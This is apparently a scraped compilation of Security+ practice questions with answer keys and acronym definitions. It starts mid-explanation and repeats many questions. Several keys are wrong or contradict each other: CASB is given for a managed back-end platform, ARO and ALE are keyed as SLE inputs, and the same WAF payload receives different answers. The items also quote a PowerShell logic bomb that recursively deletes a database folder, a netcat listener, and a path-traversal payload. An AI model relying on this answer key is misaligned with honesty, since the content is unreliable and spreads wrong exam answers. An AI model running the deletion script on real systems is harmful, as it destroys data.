Correct Answer: B Passive scanning is a method of vulnerability detection that relies on information gleaned from network data that is captured from a target computer without direct interaction. Packet sniffing applications can be used for passive scanning to reveal information such as operating system, known protocols running on non-standard ports and active network applications with known bugs. Passive scanning may be conducted by a network administrator scanning for security vulnerabilities or by an intruder as a preliminary to an active attack. For an intruder, passive scanning's main advantage is that it does not leave a trail that could alert users or administrators to their activities. For an administrator, the main advantage is that it doesn't risk causing undesired behavior on the target computer, such as freezes. Because of these advantages, passive scanning need not be limited to a narrow time frame to minimize risk or disruption, which means that it is likely to return more information. Passive scanning does have limitations. It is not as complete in detail as active vulnerability scanning and can not detect any applications that are not currently sending out traffic; nor can it distinguish false information put out for obfuscation.

QUESTION 19
An organization recently moved its custom web applications to the cloud, and it is obtaining managed services of the back-end environment as part of its subscription. Which of the following types of services is this company now using?
A. SaaS
B. CASB
C. IaaS
D. PaaS

Correct Answer: B
A Cloud Access Security Broker (CASB) gives you both visibility into your entire cloud stack and the security automation tool your IT team needs.

QUESTION 117
Which of the following metrics are used to calculate the SLE? (Select TWO)
A. ROI
B. ARO
C. ALE
D. MTBF
E. MTTF
F. TCO

Correct Answer: BC

QUESTION 16
Which of the following are used to increase the computing time it takes to brute force a password using an offline attack? (Select TWO)
A. XOR
B. PBKDF2
C. bcrypt
D. HMAC
E. RIPEMD

Correct Answer: BC

QUESTION 18
A security administrator needs to address the following audit recommendations for a public-facing SFTP server:
* Users should be restricted to upload and download files to their own home directories only.
* Users should not be allowed to use an interactive shell login.
Which of the following configuration parameters should be implemented? (Select TWO)
A. Permit Tunnel
B. Chroot Directory
C. Permit TTY
D. Allow TCP Forwarding
E. Ignore Rhosts

Correct Answer: BC

QUESTION 19
A security analyst conducts a manual scan on a known hardened host that identifies many non-compliant items. Which of the following BEST describe why this has occurred? (Select TWO)
A. Privileged-user certificates were used to scan the host
B. Non-applicable plug-ins were selected in the scan policy
C. The incorrect audit file was used
D. The output of the report contains false positives
E. The target host has been compromised

Correct Answer: BC

QUESTION 52
A security manager is creating an account management policy for a global organization with sales personnel who must access corporate network resources while traveling all over the world. Which of the following practices is the security manager MOST likely to enforce with the policy? (Select TWO)
A. Time-of-day restrictions
B. Password complexity
C. Location-based authentication
D. Group-based access control
E. Standard naming convention

Correct Answer: BC

QUESTION 54
A security administrator learns that PII, which was gathered by the organization, has been found in an open forum. As a result, several C-level executives found their identities were compromised, and they were victims of a recent whaling attack. Which of the following would prevent these problems in the future? (Select TWO)
A. Implement a reverse proxy.
B. Implement an email DLP.
C. Implement a spam filter.
D. Implement a host-based firewall.
E. Implement a HIDS.

Correct Answer: BC

QUESTION 76
When attempting to secure a mobile workstation, which of the following authentication technologies rely on the user's physical characteristics? (Select TWO)
A. MAC address table
B. Retina scan
C. Fingerprint scan
D. Two-factor authentication
E. CAPTCHA
F. Password string

Correct Answer: BC

QUESTION 11
Which of the following could help detect trespassers in a secure facility? (Select TWO)
A. Faraday cages
B. Motion-detection sensors
C. Tall, chain-link fencing
D. Security guards
E. Smart cards

Correct Answer: BD

QUESTION 140
A manager wants to distribute a report to several other managers within the company. Some of them reside in remote locations that are not connected to the domain but have a local server. Because there is sensitive data within the report and the size is beyond the limit of the email attachment size, emailing the report is not an option. Which of the following protocols should be implemented to distribute the report securely? (Select THREE)
A. S/MIME
B. SSH
C. SNMPv3
D. FTPS
E. SRTP
F. HTTPS
G. LDAPS

Correct Answer: BDF

QUESTION 31
A manager wants to distribute a report to several other managers within the company. Some of them reside in remote locations that are not connected to the domain but have a local server. Because there is sensitive data within the report and the size of the report is beyond the limit of the email attachment size, emailing the report is not an option. Which of the following protocols should be implemented to distribute the report securely? (Select THREE)
A. S/MIME
B. SSH
C. SNMPv3
D. FTPS
E. SRTP
F. HTTPS
G. LDAPS

Correct Answer: BDF

QUESTION 114
A company wants to implement an access management solution that allows employees to use the same usernames and passwords for multiple applications without having to keep multiple credentials synchronized. Which of the following solutions would BEST meet these requirements? (Choose TWO)
A. Multifactor authentication
B. SSO
C. Biometrics
D. PKI
E. Federation

Correct Answer: BE

QUESTION 11
A security administrator is diagnosing a server where the CPU utilization is at 100% for 24 hours. The main culprit of CPU utilization is the antivirus program. Which of the following issues could occur if left unresolved? (Select TWO)
A. MITM attack
B. DoS attack
C. DLL injection
D. Buffer overflow
E. Resource exhaustion

Correct Answer: BE

QUESTION 18
A security administrator has written a script that will automatically upload binary and text-based configuration files onto a remote server using a scheduled task. The configuration files contain sensitive information. Which of the following should the administrator use? (Select TWO)
A. TOTP
B. SCP
C. FTP over a non-standard port
D. SRTP
E. Certificate-based authentication
F. SNMPv3

Correct Answer: BE

QUESTION 90
Ann, a user, reports she is unable to access an application from her desktop. A security analyst verifies Ann's access and checks the SIEM for any errors. The security analyst reviews the log file from Ann's system and notices the following output:
2017--08-21 10:48:12 DROP TCP 172.20.89.232 239.255.255.255 443 1900 250 -------- RECEIVE
2017--08-21 10:48:12 DROP UDP 192.168.72.205 239.255.255.255 443 1900 250 -------- RECEIVE
Which of the following is MOST likely preventing Ann from accessing the application from the desktop?
A. Web application firewall
B. DLP
C. Host-based firewall
D. UTM
E. Network-based firewall

Correct Answer: B
Webmail is being blocked. The 250 response code is for SMTP.

QUESTION 104
A security administrator is reviewing the following PowerShell script referenced in the Task Scheduler on a database server:

$members = Get-ADGroupMember -Identity "Domain Admins" -Recursive | Select -ExpandProperty name
if ($members -notcontains "JohnDoe") {
    Remove-Item -Path C:\Database -Recurse -Force
}

Which of the following did the security administrator discover?
A. Ransomware
B. Backdoor
C. Logic bomb
D. Trojan

Correct Answer: C

QUESTION 110
A bank uses a wireless network to transmit credit card purchases to a billing system. Which of the following would be MOST appropriate to protect credit card information from being accessed by unauthorized individuals outside of the premises?
A. Air gap
B. Infrared detection
C. Faraday cage
D. Protected distributions

Correct Answer: C

QUESTION 112
A help desk technician receives a phone call from an individual claiming to be an employee of the organization and requesting assistance to access a locked account. The help desk technician asks the individual to provide proof of identity before access can be granted. Which of the following types of attack is the caller performing?
A. Phishing
B. Shoulder surfing
C. Impersonation
D. Dumpster diving

Correct Answer: C

QUESTION 116
Which of the following authentication concepts is a gait analysis MOST closely associated with?
A. Somewhere you are
B. Something you are
C. Something you do
D. Something you know

Correct Answer: C

QUESTION 119
When sending messages using symmetric encryption, which of the following must happen FIRST?
A. Exchange encryption key
B. Establish digital signatures
C. Agree on an encryption method
D. Install digital certificates

Correct Answer: C

QUESTION 12
The IT department is deploying new computers. To ease the transition, users will be allowed to access their old and new systems. The help desk is receiving reports that users are experiencing the following error when attempting to log in to their previous system: "Logon Failure: Access Denied". Which of the following can cause this issue?
A. Permission issues
B. Access violations
C. Certificate issues
D. Misconfigured devices

Correct Answer: C

QUESTION 120
Which of the following scenarios BEST describes an implementation of non-repudiation?
A. A user logs into a domain workstation and accesses network file shares for another department
B. A user remotely logs into the mail server with another user's credentials
C. A user sends a digitally signed email to the entire finance department about an upcoming meeting
D. A user accesses the workstation registry to make unauthorized changes to enable functionality within an application

Correct Answer: C

QUESTION 123
Which of the following would be considered multifactor authentication?
A. Hardware token and smart card
B. Voice recognition and retina scan
C. Strong password and fingerprint
D. PIN and security questions

Correct Answer: C

QUESTION 126
A security auditor is testing perimeter security in a building that is protected by badge readers. Which of the following types of attacks would MOST likely gain access?
A. Phishing
B. Man-in-the-middle
C. Tailgating
D. Watering hole
E. Shoulder surfing

Correct Answer: C

QUESTION 127
Which of the following encryption methods does PKI typically use to securely protect keys?
A. Elliptic curve
B. Digital signatures
C. Asymmetric
D. Obfuscation

Correct Answer: C

QUESTION 128
A department head at a university resigned on the first day of the spring semester. It was subsequently determined that the department head deleted numerous files and directories from the server-based home directory while the campus was closed. Which of the following policies or procedures could have prevented this from occurring?
A. Time-of-day restrictions
B. Permissions auditing and review
C. Off boarding
D. Account expiration

Correct Answer: C

QUESTION 12
Which of the following is used to validate the integrity of data?
A. CBC
B. Blowfish
C. MD5
D. RSA

Correct Answer: C

64. A technician is investigating a potentially compromised device with the following symptoms:
* Browser slowness
* Frequent browser crashes
* Hourglass stuck
* New search toolbar
* Increased memory consumption
Which of the following types of malware has infected the system?
a. Man in the middle
b. Spoofer
c. Spyware
d. Adware

D

QUESTION 139
Which of the following is the BEST reason to run an untested application in a sandbox?
A. To allow the application to take full advantage of the host system's resources and storage
B. To utilize the host system's antivirus and firewall applications instead of running its own protection
C. To prevent the application from acquiring escalated privileges and accessing its host system
D. To increase application processing speed so the host system can perform real-time logging

Correct Answer: C

QUESTION 15
A company was recently audited by a third party. The audit revealed the company's network devices were transferring files in the clear. Which of the following protocols should the company use to transfer files?
A. HTTPS
B. LDAPS
C. SCP
D. SNMPv3

Correct Answer: C

QUESTION 17
Users in a corporation currently authenticate with a username and password. A security administrator wishes to implement two-factor authentication to improve security. Which of the following authentication methods should be deployed to achieve this goal?
A. PIN
B. Security question
C. Smart card
D. Passphrase
E. CAPTCHA

Correct Answer: C

QUESTION 17
A cybersecurity analyst is looking into the payload of a random packet capture file that was selected for analysis. The analyst notices that an internal host had a socket established with another internal host over a non-standard port. Upon investigation, the origin host that initiated the socket shows this output:
usera@host> history
mkdir /local/usr/bin/somedirectory
nc -l 192.168.5.1 -p 9856
ping -c 30 8.8.8.8 -a 600
rm /etc/dir2/somefile
rm -rm /etc/dir2/
traceroute 8.8.8.8
pakill pid 9487
usera@host>
Given the above output, which of the following commands would have established the questionable socket?
A. traceroute 8.8.8.8
B. ping -1 30 8.8.8.8 -a 600
C. nc -l 192.168.5.1 -p 9856
D. pskill pid 9487

Correct Answer: C

QUESTION 21
A company is evaluating cloud providers to reduce the cost of its internal IT operations. The company's aging systems are unable to keep up with customer demand. Which of the following cloud models will the company MOST likely select?
A. PaaS
B. SaaS
C. IaaS
D. BaaS

Correct Answer: C

QUESTION 24
The help desk received a call after hours from an employee who was attempting to log into the payroll server remotely. When the help desk returned the call the next morning, the employee was able to log into the server remotely without incident. However, the incident occurred again the next evening. Which of the following BEST describes the cause of the issue?
A. The password expired on the account and needed to be reset
B. The employee does not have the rights needed to access the database remotely
C. Time-of-day restrictions prevented the account from logging in
D. The employee's account was locked out and needed to be unlocked

Correct Answer: C

QUESTION 29
Which of the following BEST describes an important security advantage yielded by implementing vendor diversity?
A. Sustainability
B. Homogeneity
C. Resiliency
D. Configurability

Correct Answer: C

QUESTION 31
An active/passive configuration has an impact on:
A. confidentiality
B. integrity
C. availability
D. non-repudiation

Correct Answer: C

QUESTION 32
A vice president at a manufacturing organization is concerned about desktops being connected to the network. Employees need to log onto the desktops' local account to verify that a product is being created within specifications; otherwise, the desktops should be as isolated as possible. Which of the following is the BEST way to accomplish this?
A. Put the desktops in the DMZ.
B. Create a separate VLAN for the desktops.
C. Air gap the desktops.
D. Join the desktops to an ad-hoc network.

Correct Answer: C

QUESTION 32
Which of the following attack types BEST describes a client-side attack that is used to manipulate an HTML iframe with JavaScript code via a web browser?
A. Buffer overflow
B. MITM
C. XSS
D. SQLi

Correct Answer: C

QUESTION 33
An in-house penetration tester has been asked to evade a new DLP system. The tester plans to exfiltrate data through steganography. Discovery of which of the following would help catch the tester in the act?
A. Abnormally high numbers of outgoing instant messages that contain obfuscated text
B. Large-capacity USB drives on the tester's desk with encrypted zip files
C. Outgoing emails containing unusually large image files
D. Unusual SFTP connections to a consumer IP address

Correct Answer: C

QUESTION 34
A member of the admins group reports being unable to modify the "changes" file on a server. The permissions on the file are as follows:
Permissions  User    Group   File
-rwxrw-r--+  Admins  Admins  changes
Based on the output above, which of the following BEST explains why the user is unable to modify the "changes" file?
A. The SELinux mode on the server is set to "enforcing."
B. The SELinux mode on the server is set to "permissive."
C. An FACL has been added to the permissions for the file.
D. The admins group does not have adequate permissions to access the file.

Correct Answer: C

QUESTION 34
A security analyst receives an alert from a WAF with the following payload:
var data = "<test test test> ++ <../../../../../../etc/passwd>"
Which of the following types of attacks is this?
A. Cross-site request forgery
B. Buffer overflow
C. SQL injection
D. JavaScript data insertion
E. Firewall evasion script

Correct Answer: C

QUESTION 35
Which of the following uses precomputed hashes to guess passwords?
A. Iptables
B. NAT tables
C. Rainbow tables
D. ARP tables

Correct Answer: C

QUESTION 38
A company is deploying smartphones for its mobile salesforce. These devices are for personal and business use but are owned by the company. Sales personnel will save new customer data via a custom application developed for the company. This application will integrate with the contact information stored in the smartphones and will populate new customer records onto it. The customer application's data is encrypted at rest, and the application's connection to the back office system is considered secure. The Chief Information Security Officer (CISO) has concerns that customer contact information may be accidentally leaked due to the limited security capabilities of the devices and the planned controls. Which of the following will be the MOST efficient security control to implement to lower this risk?
A. Implement a mobile data loss agent on the devices to prevent any user manipulation with the contact information.
B. Restrict screen capture features on the devices when using the custom application and the contact information.
C. Restrict contact information storage dataflow so it is only shared with the customer application.
D. Require complex passwords for authentication when accessing the contact information.

Correct Answer: C

GRE

Generic Routing Encapsulation. A tunneling protocol developed by Cisco Systems.

QUESTION 35
A penetration tester is conducting an assessment on Comptia.org and runs the following command from a coffee shop while connected to the public Internet:
c:\>nslookup -querytype=MX comptia.org
Server: Unknown
Address: 198.51.100.45
comptia.org MX preference=10, mail exchanger = 92.68.102.33
comptia.org MX preference=20, mail exchanger = exchg1.comptia.org
exchg1.comptia.org internet address = 192.168.102.67
Which of the following should the penetration tester conclude about the command output?
A. The public/private views on the Comptia.org DNS servers are misconfigured.
B. Comptia.org is running an older mail server, which may be vulnerable to exploits.
C. The DNS SPF records have not been updated for Comptia.org.
D. 192.168.102.67 is a backup mail server that may be more vulnerable to attack.

Correct Answer: D

QUESTION 37
In determining when it may be necessary to perform a credentialed scan against a system instead of a non-credentialed scan, which of the following requirements is MOST likely to influence the decision?
A. The scanner must be able to enumerate the host OS of devices scanned
B. The scanner must be able to footprint the network
C. The scanner must be able to check for open ports with listening services
D. The scanner must be able to audit file system permissions

Correct Answer: D

QUESTION 39
The Chief Information Security Officer (CISO) is asking for ways to protect against zero-day exploits. The CISO is concerned that an unrecognized threat could compromise corporate data and result in regulatory fines as well as poor corporate publicity. The network is mostly flat, with split staff/guest wireless functionality. Which of the following equipment MUST be deployed to guard against unknown threats?
A. Cloud-based antivirus solution, running as local admin, with push technology for definition updates
B. Implementation of an off-site datacenter hosting all company data, as well as deployment of VDI for all client computing needs
C. Host-based heuristic IPS, segregated on a management VLAN, with direct control of the perimeter firewall ACLs
D. Behavior-based IPS with a communication link to a cloud-based vulnerability and threat feed

Correct Answer: D

QUESTION 41
A security analyst is investigating a potential breach. Upon gathering, documenting, and securing the evidence, which of the following actions is the NEXT step to minimize the business impact?
A. Launch an investigation to identify the attacking host
B. Initiate the incident response plan
C. Review lessons learned captured in the process
D. Remove malware and restore the system to normal operation

Correct Answer: D

QUESTION 41
An organization identifies a number of hosts making outbound connections to a known malicious IP over port TCP 80. The organization wants to identify the data being transmitted and prevent future connections to this IP. Which of the following should the organization do to achieve this outcome?
A. Use a protocol analyzer to reconstruct the data and implement a web-proxy.
B. Deploy a web-proxy and then blacklist the IP on the firewall.
C. Deploy a web-proxy and implement IPS at the network edge.
D. Use a protocol analyzer to reconstruct the data and blacklist the IP on the firewall.

Correct Answer: D

QUESTION 45
A forensic expert is given a hard drive from a crime scene and is asked to perform an investigation. Which of the following is the FIRST step the forensic expert needs to take in the chain of custody?
A. Make a forensic copy
B. Create a hash of the hard drive
C. Recover the hard drive data
D. Update the evidence log

Correct Answer: D

QUESTION 46
An incident response manager has started to gather all the facts related to a SIEM alert showing multiple systems may have been compromised. The manager has gathered these facts:
* The breach is currently indicated on six user PCs
* One service account is potentially compromised
* Executive management has been notified
In which of the following phases of the IRP is the manager currently working?
A. Recovery
B. Eradication
C. Containment
D. Identification

Correct Answer: D

QUESTION 47
A stock trading company had the budget for enhancing its secondary datacenter approved. Since the main site is in a hurricane-affected area and the disaster recovery site is 100 mi (161 km) away, the company wants to ensure its business is always operational with the least amount of man hours needed. Which of the following types of disaster recovery sites should the company implement?
A. Hot site
B. Warm site
C. Cold site
D. Cloud-based site

Correct Answer: D

QUESTION 48
A systems administrator is attempting to recover from a catastrophic failure in the datacenter. To recover the domain controller, the systems administrator needs to provide the domain administrator credentials. Which of the following account types is the system administrator using?
A. Shared accounts
B. Guest account
C. Service account
D. User account

Correct Answer: D

QUESTION 4
An administrator is replacing a wireless router. The configuration of the old wireless router was not documented before it stopped functioning. The equipment connecting to the wireless network uses older legacy equipment that was manufactured prior to the release of the 802.11i standard. Which of the following configuration options should the administrator select for the new wireless router?
A. WPA+CCMP
B. WPA2+CCMP
C. WPA+TKIP
D. WPA2+TKIP

Correct Answer: D

QUESTION 54 The computer resource center issues smartphones to all first-level and above managers. The managers have the ability to install mobile tools. Which of the following tools should be implemented to control the types of tools the managers install? A. Download manager B. Content manager C. Segmentation manager D. Application manager

Correct Answer: D

QUESTION 55 A security engineer is configuring a wireless network with EAP-TLS. Which of the following activities is a requirement for this configuration? A. Setting up a server B. Configuring federation between authentication servers C. Enabling TOTP D. Deploying certificates to endpoint devices

Correct Answer: D

QUESTION 55 A systems administrator wants to provide for and enforce wireless access accountability during events where external speakers are invited to make presentations to a mixed audience of employees and non-employees. Which of the following should the administrator implement? A. Shared accounts B. Preshared passwords C. Least privilege D. Sponsored guest

Correct Answer: D

QUESTION 56 Ann is the IS manager for several new systems in which the classification of the systems' data is being decided. She is trying to determine the sensitivity level of the data being processed. Which of the following people should she consult to determine the data classification? A. Steward B. Custodian C. User D. Owner

Correct Answer: D

EAP

Extensible Authentication Protocol. An authentication framework that provides general guidance for authentication methods. Variations include LEAP and PEAP.

QUESTION 58 A systems administrator wants to generate a self-signed certificate for an internal website. Which of the following steps should the systems administrator complete prior to installing the certificate on the server? A. Provide the private key to a public CA. B. Provide the public key to the internal CA. C. Provide the public key to a public CA. D. Provide the private key to the internal CA. E. Provide the public/private key pair to the internal CA. F. Provide the public/private key pair to a public CA.

Correct Answer: D

QUESTION 59 A new Chief Information Officer (CIO) has been reviewing the badging and decides to write a policy that all employees must have their badges rekeyed at least annually. Which of the following controls BEST describes this policy? A. Physical B. Corrective C. Technical D. Administrative

Correct Answer: D

QUESTION 61 A security engineer wants to implement a site-to-site VPN that will require SSL certificates for mutual authentication. Which of the following should the engineer implement if the design requires client MAC addresses to be visible across the tunnel? A. Tunnel mode IPSec B. Transport mode VPN IPSec C. L2TP D. SSL VPN

Correct Answer: D

QUESTION 63 A company is allowing a BYOD policy for its staff. Which of the following is a best practice that can decrease the risk of users jailbreaking mobile devices? A. Install a corporately monitored mobile antivirus on the devices. B. Prevent the installation of applications from a third-party application store. C. Build a custom ROM that can prevent jailbreaking. D. Require applications to be digitally signed.

Correct Answer: D

QUESTION 71 A Chief Information Officer (CIO) has decided it is not cost effective to implement safeguards against a known vulnerability. Which of the following risk responses does this BEST describe? A. Transference B. Avoidance C. Mitigation D. Acceptance

Correct Answer: D

QUESTION 72 An audit takes place after company-wide restructuring, in which several employees changed roles. The following deficiencies are found during the audit regarding access to confidential data (Employee / Job Function / Audit Finding): Ann / Sales Manager / access to confidential payroll shares, access to payroll processing program, access to marketing shares. Jeff / Marketing Director / access to human resources annual review folder, access to shared human resources mailbox. John / Sales Manager / active account, access to human resources annual review folder, access to confidential payroll shares. Which of the following would be the BEST method to prevent similar audit findings in the future? A. Implement separation of duties for the payroll department B. Implement a DLP solution on the payroll and human resources reviews C. Implement rule-based access controls on the human resources server D. Implement regular permission auditing and reviews

Correct Answer: D

QUESTION 74 A penetration tester has written an application that performs a bit-by-bit XOR 0xFF operation on binaries prior to transmission over untrusted media. Which of the following BEST describes the action performed by this type of application? A. Hashing B. Key exchange C. Encryption D. Obfuscation

Correct Answer: D

QUESTION 80 A technician is configuring a load balancer for the application team to accelerate the network performance of their applications. The applications are hosted on multiple servers and must be redundant. Given this scenario, which of the following would be the BEST method of configuring the load balancer? A. Round-robin B. Weighted C. Least connection D. Locality-based

Correct Answer: D

QUESTION 81 Ann is the IS manager for several new systems in which the classifications of the systems' data are being decided. She is trying to determine the sensitivity level of the data being processed. Which of the following people should she consult to determine the data classification? A. Steward B. Custodian C. User D. Owner

Correct Answer: D

QUESTION 86 A security analyst is hardening a WiFi infrastructure. The primary requirements are the following: the infrastructure must allow staff to authenticate using the most secure method; the infrastructure must allow guests to use an "open" WiFi network that logs valid email addresses before granting access to the Internet. Given these requirements, which of the following statements BEST represents what the analyst should recommend and configure? A. Configure a captive portal for guests and WPS for staff. B. Configure a captive portal for staff and WPA for guests. C. Configure a captive portal for staff and WEP for guests. D. Configure a captive portal for guests and WPA2 Enterprise for staff.

Correct Answer: D

QUESTION 95 A business sector is highly competitive, and safeguarding trade secrets and critical information is paramount. On a seasonal basis, an organization employs temporary hires and contractor personnel to accomplish its mission objectives. The temporary and contract personnel require access to network resources only when on the clock. Which of the following account management practices are the BEST ways to manage these accounts? A. Employ time-of-day restrictions. B. Employ password complexity. C. Employ a random key generator strategy. D. Employ an account expiration strategy. E. Employ a password lockout policy.

Correct Answer: D

QUESTION 96 Which of the following locations contains the MOST volatile data? A. SSD B. Paging file C. RAM D. Cache memory

Correct Answer: D

QUESTION 144 A systems administrator wants to implement a wireless protocol that will allow the organization to authenticate mobile devices prior to providing the user with a captive portal login. Which of the following should the systems administrator configure? A. L2TP with MAC filtering B. EAP-TTLS C. WPA2-CCMP with PSK D. RADIUS federation

Correct Answer: D. RADIUS generally includes 802.1X, which pre-authenticates devices.

QUESTION 141 A company is performing an analysis of the corporate enterprise network with the intent of identifying what will cause losses in revenue, referrals, and/or reputation when out of commission. Which of the following is an element of a BIA that is being addressed? A. Mission-essential function B. Single point of failure C. Backup and restoration plans D. Identification of critical systems

Correct Answer: D. The BIA is composed of the following three steps: Determine mission/business processes and recovery criticality. Mission/business processes supported by the system are identified and the impact of a system disruption to those processes is determined along with outage impacts and estimated downtime.

6. A system administrator is attempting to recover from a catastrophic failure in the datacenter. To recover the domain controller, the systems administrator needs to provide the domain administrator's credentials. Which of the following account types is the system administrator using? a. Shared account b. Guest account c. Service Account d. User account

D

QUESTION 136 Security administrators attempted corrective action after a phishing attack. Users are still experiencing trouble logging in, as well as an increase in account lockouts. Users' email contacts are complaining of an increase in spam and social networking requests. Due to a large number of affected accounts, remediation must be accomplished quickly. Which of the following actions should be taken FIRST? (Select TWO) A. Disable the compromised accounts B. Update WAF rules to block social networks C. Remove the compromised accounts with all AD groups D. Change the compromised accounts' passwords E. Disable the open relay on the email server F. Enable sender policy framework

Correct Answer: EF. Sender Policy Framework (SPF) is a simple email-validation system designed to detect email spoofing by providing a mechanism to allow receiving mail exchangers to check that incoming mail from a domain comes from a host authorized by that domain's administrators. In a Small Business Server environment, you may have to prevent your Microsoft Exchange Server-based server from being used as an open relay SMTP server for unsolicited commercial e-mail messages, or spam. You may also have to clean up the Exchange server's SMTP queues to delete the unsolicited commercial email messages. If your Exchange server is being used as an open SMTP relay, you may experience one or more of the following symptoms: the Exchange server cannot deliver outbound SMTP mail to a growing list of e-mail domains; Internet browsing is slow from the server and from the local area network (LAN) clients; free disk space on the Exchange server in the location of the Exchange information store databases or the Exchange information store transaction logs is reduced more rapidly than you expect; the Microsoft Exchange information store databases spontaneously dismount. You may be able to manually mount the stores by using Exchange System Manager, but the stores may dismount on their own after they run for a short time. For more information, click the following article number to view the article in the Microsoft Knowledge Base:

CCMP

Counter Mode with Cipher Block Chaining Message Authentication Code Protocol. An encryption protocol based on AES used with WPA2 for wireless security. It is more secure than TKIP, which was used with the original release of WPA.

XSRF

Cross-site request forgery. An attack that causes users to perform actions on websites without their knowledge. In some cases, attackers use header manipulation to steal cookies and harvest passwords.

XSS

Cross-site scripting. XSS allows an attacker to redirect users to malicious websites and steal cookies. E-mail can include an embedded HTML image object or a JavaScript image tag as part of a malicious cross-site scripting attack. Websites prevent cross-site scripting attacks with input validation to detect and block input that includes HTML and JavaScript tags. Many sites prevent the use of < and > characters to block cross-site scripting.

CRC

Cyclical Redundancy Check. An error detection code used to detect accidental changes that can affect the integrity of data.

21. When attackers use a compromised host as a platform for launching attacks deeper into a company's network, it is said they are: a. Escalating privilege b. Becoming persistent c. Fingerprinting d. Pivoting

D

23. Which of the following would provide additional security by adding another factor to a smart card? a. Token b. Proximity badge c. Physical key d. PIN

D

27. A security technician has been receiving alerts from several servers that indicate load balancers have had a significant increase in traffic. The technician initiates a system scan. The scan results illustrate that the disk space on several servers has reached capacity. The scan also indicates that incoming internet traffic to the servers has increased. Which of the following is the most likely cause of the decreased disk space? a. Misconfigured devices b. Log and events anomalies c. Authentication issues d. Unauthorized software

D

30. A security analyst receives an alert from a WAF with the following payload: var data = "<test test test> ++ <../../../../../etc/passwd>" Which of the following types of attack is this? a. Cross site forgery b. Buffer Overflow c. SQL injection d. JavaScript data insertion e. Firewall evasion script

D

32. A security engineer wants to implement a site to site VPN that will require SSL certificates for mutual authentication. Which of the following should the engineer implement if the design requires client MAC addresses to be visible across the tunnel? a. Tunnel mode IPSec b. Transport mode VPN IPSec c. L2TP d. SSL VPN

D

39. A security analyst is investigating a potential breach. Upon gathering, documenting and securing the evidence, which of the following actions is the next step to minimize the business impact? a. Launch an investigation to identify the attacking host b. Initiate the incident response plan c. Review lessons learned captured in the process d. Remove malware and restore the system to normal operation

D

4. A penetration tester has written an application that performs a bit-by-bit XOR 0xFF operation on binaries prior to transmission over trusted media. Which of the following best describes the action performed by this type of application? a. Hashing b. Key Exchange c. Encryption d. Obfuscation

D

40. The computer resource center issued smartphones to all first-level and above managers. The managers have the ability to install mobile tools. Which of the following tools should be implemented to control the types of tools the managers install? a. Download manager b. Content Manager c. Segmentation Manager d. Application Manager

D

43. The company has a policy that all of the employees must have their badges rekeyed at least annually. Which of the following describes this policy? a. Physical b. Corrective c. Technical d. Administrative

D

51. Which of the following attacks best describes a client-side attack that is used to manipulate an HTML iframe with JavaScript code via a web browser? a. Buffer overflow b. MITM c. XSS d. SQLi

D

52. A home invasion occurred recently in which an intruder compromised a home network and accessed a WIFI enabled baby monitor while the baby's parents were sleeping. Which of the following best describes how the intruder accessed the monitor? a. Outdated virus b. WIFI signal strength c. Social engineering d. Default configurations

D

53. To help prevent one job role from having sufficient access to create, modify and approve payroll data, which of the following practices should be employed? a. Least privilege b. Job rotation c. Background checks d. Separation of duties

D

59. Which of the following types of social engineering attacks targets Chief Information Officers over email? a. Whaling b. Vishing c. Tailgating d. Spear Phishing

D

XML

Extensible markup language. Used by many databases for inputting or exporting data. XML uses formatting rules to describe the data.

72. An audit takes place after company-wide restructuring, in which several employees changed roles. The following deficiencies are found during the audit regarding access to confidential data (Employee / Job Function / Audit Finding): Ann / Sales manager / access to confidential payroll shares, access to payroll processing program, access to marketing shares. Jeff / Marketing director / access to human resources annual review folder, access to shared human resources mailbox. John / Sales manager (terminated) / active account, access to human resources annual review folder, access to confidential payroll shares. Which of the following would be the BEST method to prevent similar audit findings in the future? a. Implement separation of duties for the payroll department b. Implement a DLP solution on the payroll and HR servers c. Implement rule-based access controls on the HR server d. Implement regular permission auditing and reviews

D

47. A security administrator is diagnosing a server where the CPU utilization is at 100% for 24 hours. The main culprit of CPU utilization is the antivirus program. Which of the following issues could occur if left unresolved? Choose two. a. MITM attack b. DoS attack c. DLL injection d. Buffer overflow e. Resource exhaustion

D,E

DEP

Data Execution Prevention. A security feature in some operating systems. It helps prevent an application or service from executing code from a nonexecutable memory region.

DLP

Data Loss Protection. A network-based DLP system can examine and analyze network traffic. It can detect if confidential company data or any PII data is included in e-mail and reduce the risk of internal users e-mailing sensitive data outside the organization.

DMZ

Demilitarized zone. Area between two firewalls separating the Internet and an internal network. A DMZ provides a layer of protection for Internet-facing servers. It allows access to a server or service for Internet users while segmenting and protecting access to the internal network.

DoS

Denial-of-service. An attack from a single source that attempts to disrupt the services provided by another system. Examples include SYN flood, smurf, and some buffer overflow attacks. Compare to DDoS.

DES

Digital Encryption Standard. An older symmetric encryption standard used to provide confidentiality. DES uses 56 bits and is considered cracked.

DSA

Digital Signature Algorithm. A digital signature is an encrypted hash of a message. The sender's private key encrypts the hash of the message to create the digital signature. The recipient decrypts the hash with the sender's public key, and, if successful, it provides authentication, non-repudiation, and integrity. Authentication identifies the sender. Integrity verifies the message has not been modified. Non-repudiation is used with online transactions and prevents the sender from later denying they sent the e-mail.

DRP

Disaster recovery plan. A document designed to help a company respond to disasters, such as hurricanes, floods, and fires. It includes a hierarchical list of critical systems and often prioritizes services to restore after an outage. Testing validates the plan. Recovered systems are tested before returning them to operation, and this can include a comparison to baselines. The final phase of disaster recovery includes a review to identify any lessons learned and may include an update of the plan.

DACL

Discretionary Access Control List. List of Access Control Entries (ACEs) in Microsoft's NTFS. Each ACE includes a security identifier (SID) and a permission.

DAC

Discretionary Access Control. An access control model where all objects have owners and owners can modify permissions for the objects (files and folders). Microsoft's NTFS uses the DAC model. Other access control models are MAC and RBAC.

RAID-1

Disk mirroring. RAID-1 uses two disks and provides fault tolerance.

RAID-5

Disk striping with parity. RAID-5 uses three or more disks and provides fault tolerance.

RAID-0

Disk striping. RAID-0 improves performance but does not provide fault tolerance.

DDoS

Distributed denial-of-service. An attack on a system launched from multiple sources intended to make a computer's resources or services unavailable to users. DDoS attacks are often launched from zombies in botnets. DDoS attacks typically include sustained, abnormally high network traffic. A performance baseline helps administrators detect a DDoS. Compare to DoS.

DNS

Domain Name System. Used to resolve host names to IP addresses. DNS is the primary name resolution service used on the Internet and is also used on internal networks. DNS uses port 53. DNS poisoning attempts to modify or corrupt cached DNS results. A pharming attack is a specific type of DNS poisoning attack that redirects a website's traffic to another website.

DHCP

Dynamic Host Configuration Protocol. A service used to dynamically assign TCP/IP configuration information to clients. DHCP is often used to assign IP addresses, subnet masks, default gateways, DNS server addresses, and much more.

DLL

Dynamic Link Library. A compiled set of code that can be called from other programs.

EMI

